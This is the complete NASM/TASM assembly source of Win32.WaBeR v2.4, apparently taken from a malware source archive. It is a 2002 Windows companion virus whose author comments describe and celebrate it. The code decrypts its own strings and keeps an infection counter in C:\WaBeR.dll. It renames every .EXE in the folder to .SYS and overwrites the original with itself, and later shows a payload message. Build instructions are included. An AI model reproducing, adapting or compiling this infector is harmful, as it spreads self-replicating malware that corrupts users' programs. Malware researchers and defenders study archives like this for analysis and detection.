MalwareSourceCode/Win32/Infector/Win32.Waber.asm
2020-10-16 23:26:21 +02:00

321 lines
6.5 KiB
NASM
Raw Blame History

;===========================================================================================
; ...:: Win32.WaBeR - ViruS ::...
; Version 2.4
; by -DiA- (c) 02
; GermanY
;
;
;
; Here it is! My 1st Win32.Companion Virus ...success!!! :)
; Don't grumble about the code, it's my 2th Win32.Virus... ...and I go on. =)
; DiA_hates_machine@gmx.de
;
;
;
; Some Comments:
; -decrypt the strings
; -read the counter >not exist = MAKE IT!
; >if not 0 = go to the virus and infect some files
; >if 0 = jmp to PAYLOAD
; -payload:
; +after 24 starts the payload aktivate
; +it prints a nice message:
; ...:Weed And BEer Rulez:...
; Win32.WaBeR - ViruS
; Version 2.4
; by -DiA- (c)02
; [PLEASE RESET THE WaBeR-COUNTER : "C:\WaBeR.dll"]
; -virus renames found .EXE to .SYS file
; -virus copy itself to the .EXE file
; -after work the host runs!
; -allright...
;
;
; Greetz to Monochrom - without you, this virus can't live :)
;
;
; To Compile the WaBeR - ViruS:
; tasm32 /z /ml /m3 WaBeR24,,;
; tlink32 -Tpe -c WaBeR24,WaBeR24,, import32.lib
;
; To Compile the WaBeR - SYS:
; tasm32 /z /ml /m3 WaBeR24sys,,;
; tlink32 -Tpe -c WaBeR24sys,WaBeR24sys,, import32.lib
; rename WaBeR24sys.exe WaBeR24.sys
;===========================================================================================
;*******************************************************************************************
;*****cut*****WaBeR24.sys*******************************************************************
;.386
;.model flat
;jumps
;
;extrn MessageBoxA:PROC
;extrn ExitProcess:PROC
;
;.data
;titel db '1st Generation',0
;msg db 'Win32.WaBeR - Virus',10,13
; db 'Version 2.4',10,13
; db 'by -DiA- (c)02',10,13
; db '[my 1st companion virus in win32]',0
;
;.code
;start:
;
;push 16
;push offset titel
;push offset msg
;push 0
;call MessageBoxA
;
;push 0
;call ExitProcess
;
;end start
;*****cut*****WaBeR24.sys*******************************************************************
;*******************************************************************************************
;=====Have Fun...===========================================================================
.386
.model flat
jumps
extrn GetCommandLineA:PROC
extrn lstrcpyA:PROC
extrn FindFirstFileA:PROC
extrn CopyFileA:PROC
extrn FindNextFileA:PROC
extrn CreateProcessA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn OpenFile:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn ReadFile:PROC
extrn CloseHandle:PROC
extrn SetFilePointer:PROC
.data
FileName db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-70
titel db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ޚ<EFBFBD><DE9A>ޚ<EFBFBD><DE9A><EFBFBD>Ț<EFBFBD><C89A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-70
msg db '<27><>ԉ<EFBFBD><D489><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E89A97><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-80,-73
db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ԛ<EFBFBD><D49A><EFBFBD>',-80,-73
db '<27>Ú<EFBFBD><C39A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ٓ<EFBFBD><D993>',-80,-73,-80,-73,-80,-73
db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E89A80><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֘<EFBFBD>',-70
FirstNum db '<27>',-70
FileMask db '<27><><EFBFBD><EFBFBD><EFBFBD>',-70
Number db 01d dup (0)
FileAttr dd 0
FileHandle dd 0
Read dd 0
Write dd 0
FindHandle dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
FindFile db 200 dup (0)
CreateFile db 200 dup (0)
VirusFile db 200 dup (0)
OriginFile db 200 dup (0)
.code
start:
;-----Decrypt all Strings-------------------------------------------------------------------
mov esi,offset FileName
mov edi,esi
mov ecx,154d
call DeCrypt
;-------------------------------------------------------------------------------------------
;-----Check the Counter---------------------------------------------------------------------
push 2
push offset FileAttr
push offset FileName
call OpenFile
cmp eax,0FFFFFFFFh
je MakeFile
mov dword ptr [FileHandle],eax
GOon:
call SetPointer
push 0
push offset Read
push 01d
push offset Number
push dword ptr [FileHandle]
call ReadFile
cmp byte ptr [Number],'0'
je BOOM
dec byte ptr [Number]
call SetPointer
push 0
push offset Write
push 01d
push offset Number
push dword ptr [FileHandle]
call WriteFile
push dword ptr [FileHandle]
call CloseHandle
jmp WaBeR
MakeFile:
push 0
push 80h
push 2
push 0
push 0
push 0C0000000h
push offset FileName
call CreateFileA
mov dword ptr [FileHandle],eax
call SetPointer
push 0
push offset Write
push 01d
push offset FirstNum
push dword ptr [FileHandle]
call WriteFile
jmp GOon
BOOM:
push dword ptr [FileHandle]
call CloseHandle
push 16
push offset titel
push offset msg
push 0
call MessageBoxA
jmp exit
SetPointer:
push 0
push 0
push 0
push dword ptr [FileHandle]
call SetFilePointer
ret
;-------------------------------------------------------------------------------------------
;-----Decrypt Loop--------------------------------------------------------------------------
DeCrypt:
lodsb
xor al,69d
not al
stosb
loop DeCrypt
ret
;-------------------------------------------------------------------------------------------
;-----Infect some Filez---------------------------------------------------------------------
WaBeR:
call GetCommandLineA
push eax
push offset VirusFile
call lstrcpyA
mov eax,offset VirusFile
GetPoint1:
cmp byte ptr [eax],'.'
jz FoundPoint1
inc eax
jmp GetPoint1
FoundPoint1:
add eax,04d
mov byte ptr [eax],00
push offset VirusFile+1
push offset OriginFile
call lstrcpyA
mov eax,offset OriginFile
GetPoint2:
cmp byte ptr [eax],'.'
jz FoundPoint2
inc eax
jmp GetPoint2
FoundPoint2:
inc eax
mov dword ptr [eax],535953h
push offset Win32FindData
push offset FileMask
call FindFirstFileA
mov dword ptr [FindHandle],eax
FindNext:
cmp eax,-1
je RunHost
or eax,eax
jz RunHost
push offset FindFile
push offset CreateFile
call lstrcpyA
mov eax,offset CreateFile
GetPoint3:
cmp byte ptr [eax],'.'
jz FoundPoint3
inc eax
jmp GetPoint3
FoundPoint3:
inc eax
mov dword ptr [eax],535953h
push 1
push offset CreateFile
push offset FindFile
call CopyFileA
push 0
push offset FindFile
push offset VirusFile+1
call CopyFileA
push offset Win32FindData
push dword ptr [FindHandle]
call FindNextFileA
jmp FindNext
RunHost:
push offset ProcessInfo
push offset StartupInfo
push 0
push 0
push 00000010h
push 0
push 0
push 0
push offset OriginFile
push offset OriginFile
call CreateProcessA
exit:
push 0
call ExitProcess
;-W-E-E-D--A-N-D--B-E-E-R--R-U-L-E-Z-----DiA------------------------------------------------
end start
;===========================================================================================